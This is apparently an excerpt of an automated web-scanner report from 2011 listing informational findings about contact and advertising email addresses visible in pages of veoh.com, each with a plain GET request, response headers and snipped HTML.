Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=98
Content-Length: 134924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.168. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:02 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.169. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.170. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=53
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.171. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 133874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.172. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:53 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 133874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.173. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:25 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 133874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.174. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:29 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 134506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.175. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=46
Content-Length: 134905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.176. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:15 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 134399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.177. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 134852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.178. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:57 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 134505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.179. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=6
Content-Length: 132755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.180. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
